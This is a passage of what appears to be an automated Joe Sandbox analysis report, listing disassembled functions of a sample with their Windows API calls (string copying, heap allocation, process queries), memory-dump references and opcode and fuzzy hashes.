                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FolderPathlstrcpy
                        • String ID:
                        • API String ID: 818526691-0
                        • Opcode ID: fdcbfc48848d5a7911094e28b20c7ae579e308a66504ec26266f00c813061030
                        • Instruction ID: 4f7386864e25dbd12fffdcf5f03f6d6b86b12cf2d181906257e37ce42fd1fc92
                        • Opcode Fuzzy Hash: fdcbfc48848d5a7911094e28b20c7ae579e308a66504ec26266f00c813061030
                        • Instruction Fuzzy Hash: CA318971B1011C9FCB65EF68DD45BED77B8BF88300F1044A8BA16972D1DE70AE848B91
                        Function 00922B60 Relevance: 6.0, APIs: 4, Instructions: 48memorytimeCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,0092A3D0,000000FF), ref: 00922B8F
                        • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00922B96
                        • GetLocalTime.KERNEL32(?,?,00000000,0092A3D0,000000FF), ref: 00922BA2
                        • wsprintfA.USER32 ref: 00922BCE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                        • String ID:
                        • API String ID: 377395780-0
                        • Opcode ID: 085e2ba383c5aba977e898a7b984879a33ee4b5458cc23522ab8256c1a899548
                        • Instruction ID: 0c9d58b9b0c6694c42ac44b270ef0cefb251a7f158df7264eda4a9e8a60c377b
                        • Opcode Fuzzy Hash: 085e2ba383c5aba977e898a7b984879a33ee4b5458cc23522ab8256c1a899548
                        • Instruction Fuzzy Hash: D80140B2904628ABCB149BC9DD45FBEB7BCFB4CB11F10011AF645A2280EBB85540C7B1
                        Function 00924480 Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON
                        Download Yara Rule
                        APIs
                        • OpenProcess.KERNEL32(00000410,00000000), ref: 00924492
                        • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 009244AD
                        • CloseHandle.KERNEL32(00000000), ref: 009244B4
                        • lstrcpy.KERNEL32(00000000,?), ref: 009244E7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                        • String ID:
                        • API String ID: 4028989146-0
                        • Opcode ID: 34a2feba54a04e211f4fcb6f3c1894d2bc4beb04adf59c9008e64bcc7c500bb9
                        • Instruction ID: 446b541b7e4f039a8f33e86764f54541ffcfa0490bcf734798e5b28d29997041
                        • Opcode Fuzzy Hash: 34a2feba54a04e211f4fcb6f3c1894d2bc4beb04adf59c9008e64bcc7c500bb9
                        • Instruction Fuzzy Hash: 12F0F6B09016256FE720BB74AC4DBEABAECAF14304F1005A1FA89D7190DFF09C808B90
                        Function 00928FD1 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • __getptd.LIBCMT ref: 00928FDD
                          • Part of subcall function 009287FF: __amsg_exit.LIBCMT ref: 0092880F
                        • __getptd.LIBCMT ref: 00928FF4
                        • __amsg_exit.LIBCMT ref: 00929002
                        • __updatetlocinfoEx_nolock.LIBCMT ref: 00929026
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                        • String ID:
                        • API String ID: 300741435-0
                        • Opcode ID: fd0a456d47ad95de30430b2cdf5ea43f2bda2eb63692fd97ec388d4a18dd5304
                        • Instruction ID: 89b4814dd62310e1254633cc9cb09e2f6e379a7f0bd0d7427831b178a351075b
                        • Opcode Fuzzy Hash: fd0a456d47ad95de30430b2cdf5ea43f2bda2eb63692fd97ec388d4a18dd5304
                        • Instruction Fuzzy Hash: 32F0BB3294D7349BD760BBB87807B5E73E06F40724F254109F444B71DADF645900EA99
                        Function 00927310 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 27stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlen.KERNEL32(------,00905BEB), ref: 0092731B
                        • lstrcpy.KERNEL32(00000000), ref: 0092733F
                        • lstrcat.KERNEL32(?,------), ref: 00927349
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcatlstrcpylstrlen
                        • String ID: ------
                        • API String ID: 3050337572-882505780
                        • Opcode ID: c9aff42189b37a652966da0b11c81c131280d9a4f913c429ae892c54c8407a61
                        • Instruction ID: a234614cc719a8df94e035250b369fb8318b834d717b92ceb95cde168024ef1e
                        • Opcode Fuzzy Hash: c9aff42189b37a652966da0b11c81c131280d9a4f913c429ae892c54c8407a61
                        • Instruction Fuzzy Hash: AAF0C9745117129FDB249F75E99892ABAF9EF85701328882DA89AD7218EB34D840DB10
                        Function 009133D0 Relevance: 5.5, APIs: 4, Instructions: 486stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00901530: lstrcpy.KERNEL32(00000000,?), ref: 00901557
                          • Part of subcall function 00901530: lstrcpy.KERNEL32(00000000,?), ref: 00901579
                          • Part of subcall function 00901530: lstrcpy.KERNEL32(00000000,?), ref: 0090159B
                          • Part of subcall function 00901530: lstrcpy.KERNEL32(00000000,?), ref: 009015FF
                        • lstrcpy.KERNEL32(00000000,?), ref: 00913422
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091344B
                        • lstrcpy.KERNEL32(00000000,?), ref: 00913471
                        • lstrcpy.KERNEL32(00000000,?), ref: 00913497
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy
                        • String ID:
                        • API String ID: 3722407311-0
                        • Opcode ID: 1f065c4dde7d30123fa4c78453843d0a1e0e74febe798c3b87438fbd5cf49f74
                        • Instruction ID: 9785c59595664a6090fb3ec32edc5275725cf42f686549b67b77c8c43aab505d
                        • Opcode Fuzzy Hash: 1f065c4dde7d30123fa4c78453843d0a1e0e74febe798c3b87438fbd5cf49f74
                        • Instruction Fuzzy Hash: E312BB70B112059FDB18CF19C558B69B7F9AF44718B29C0ADE8199B3A2D772DD82CF40
                        Function 00917C20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                        Download Yara Rule
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 00917C94
                        • std::_Xinvalid_argument.LIBCPMT ref: 00917CAF
                          • Part of subcall function 00917D40: std::_Xinvalid_argument.LIBCPMT ref: 00917D58
                          • Part of subcall function 00917D40: std::_Xinvalid_argument.LIBCPMT ref: 00917D76
                          • Part of subcall function 00917D40: std::_Xinvalid_argument.LIBCPMT ref: 00917D91
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Xinvalid_argumentstd::_
                        • String ID: string too long
                        • API String ID: 909987262-2556327735
                        • Opcode ID: 40dcd8e10cc6e150b61a82f44e0426e7b17cd7bf928ce744284922ad6ce3cd82
                        • Instruction ID: ab26430c5f861fd8419f5ba0dca5183470785bb28d3ccb38b2ac1495bf28f881
                        • Opcode Fuzzy Hash: 40dcd8e10cc6e150b61a82f44e0426e7b17cd7bf928ce744284922ad6ce3cd82
                        • Instruction Fuzzy Hash: 8B31CD7230861A4BD724DDDCE880AAAF7F9DF91750B20492AF58287741D7719DC187E4
                        Function 00906EF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,?), ref: 00906F74
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00906F7B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcess
                        • String ID: @
                        • API String ID: 1357844191-2766056989
                        • Opcode ID: a781f2f5e1af616c81148f0273536b2d3e7cecfe5e5b1318ade370282d8d189b
                        • Instruction ID: afde8686e9e2d58ea7369abe2491f63fade17b6ab80f46780a513ef5ed816537
                        • Opcode Fuzzy Hash: a781f2f5e1af616c81148f0273536b2d3e7cecfe5e5b1318ade370282d8d189b
                        • Instruction Fuzzy Hash: 5C218EB06006029FEB208B20DD84BB673F8EB41705F444978FA46CB6C5FBB5E955C760
                        Function 00922400 Relevance: 5.2, APIs: 4, Instructions: 234stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0092244C
                        • lstrlen.KERNEL32(00000000), ref: 009224E9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00922570
                        • lstrlen.KERNEL32(00000000), ref: 00922577
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID:
                        • API String ID: 2001356338-0
                        • Opcode ID: 46015193d1337cccf5522708c2d380c39e41b55c540387ca586f5784b21e0b1e
                        • Instruction ID: 6c6928d897ab24bbe06abb9d5bd6d7d94a16f6a25195621df122610c14453804
                        • Opcode Fuzzy Hash: 46015193d1337cccf5522708c2d380c39e41b55c540387ca586f5784b21e0b1e
                        • Instruction Fuzzy Hash: D281E3B1E00216ABDB14DF98EC44BAEB7B9EF84300F248069E508A7285EB759D45CF90
                        Function 00901530 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00901610: lstrcpy.KERNEL32(00000000), ref: 0090162D
                          • Part of subcall function 00901610: lstrcpy.KERNEL32(00000000,?), ref: 0090164F
                          • Part of subcall function 00901610: lstrcpy.KERNEL32(00000000,?), ref: 00901671
                          • Part of subcall function 00901610: lstrcpy.KERNEL32(00000000,?), ref: 00901693
                        • lstrcpy.KERNEL32(00000000,?), ref: 00901557
                        • lstrcpy.KERNEL32(00000000,?), ref: 00901579
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090159B
                        • lstrcpy.KERNEL32(00000000,?), ref: 009015FF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy
                        • String ID:
                        • API String ID: 3722407311-0
                        • Opcode ID: 13bfed507301aba6dad0cfa2003c44f4096eca15151f971bd31b8e2989a4a4d2
                        • Instruction ID: 0329c249f6284a9a3470cbfa80ea1d7dd9d98aa2be90b8e9b57075ef7fd103cf
                        • Opcode Fuzzy Hash: 13bfed507301aba6dad0cfa2003c44f4096eca15151f971bd31b8e2989a4a4d2
                        • Instruction Fuzzy Hash: 3231D674A01F02AFC724DF3AC588956BBF9BF88300714492DA896C7B50DB70F811CB80
                        Function 00921570 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000), ref: 009215A1
                        • lstrcpy.KERNEL32(00000000,?), ref: 009215D9
                        • lstrcpy.KERNEL32(00000000,?), ref: 00921611
